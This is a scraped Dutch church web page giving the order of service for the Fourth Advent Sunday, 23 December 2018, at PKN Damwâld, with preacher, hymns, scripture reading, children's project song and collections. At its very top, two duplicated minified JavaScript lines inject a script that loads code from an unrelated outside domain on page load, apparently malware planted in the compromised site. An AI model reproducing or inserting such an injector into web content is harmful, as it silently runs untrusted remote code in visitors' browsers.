;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 23 december 2018 9:30 uur - PKN Damwâld
zondag 23 december 2018
09:30 uur
Vierde Advent / KingKids kerstproject 'Lichtdragers van God'

Kerkdienst zondag 23 december 2018 9:30 uur

Informatie

Voorganger:Ds. G. Timmer, Twijzelerheide/Burdaard
Organist:Jaap van der Horn
Mededeling:Vierde Advent / KingKids kerstproject 'Lichtdragers van God'
Liturgie
Lied voor de dienst: Hoe zal ik U ontvangen Gezang 117 : 1 en 3
Binnenkomst kerkenraad en voorganger
Intochtslied Psalm 98: 1 en 2
Stil gebed, bemoediging en groet
Vierde Advent ...
De vierde adventskaars wordt aangestoken door Allys. Gerrit Auke leest daarbij een gedichtje voor: ‘Het feest van Jezus komt er aan, ‘k zie al vier kaarsjes brandend staan’.
Lied van Advent: Nu daagt het in het oosten Gezang 124: 1, 3 en 5
Kerstproject KINGKIDS ... Lichtdragers van God
Vertelling door Durkje en Geertje.
We zingen daarna het 4e couplet van het projectlied op de wijze van "Midden in de winternacht" (ELB. 106).

Refrein:
Dragers van Gods licht te zijn,
wat was dat bijzonder,
zij getuigden, groot en klein,
van een lichtend wonder.

Couplet:
Kindje, dat Johannes heet
en van Gods genade weet,
levend teken van
’t grootste reddingsplan.
Hij getuigt, roept het uit:
straks komt de Messias,
Die sinds lang beloofd was.

De kinderen verlaten vervolgens de kerk.
We lezen het Schriftgedeelte 1 Samuël 1: 1-18 NBV
We zingen Gezang 66: 1, 2, 3, 4, 5 en 6
Verkondiging 'Gezien worden'
We zingen Psalm 139: 1, 4 en 5
Dankgebed en voorbeden
Collectes
We zingen als slotlied Lied 376 Evangelische Liedbundel: 1 en 2
Zegen besloten door het zingen van Gezang 456: 3
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Diaconie
Tweede collecte: Kerk
Uitganscollecte: Kerk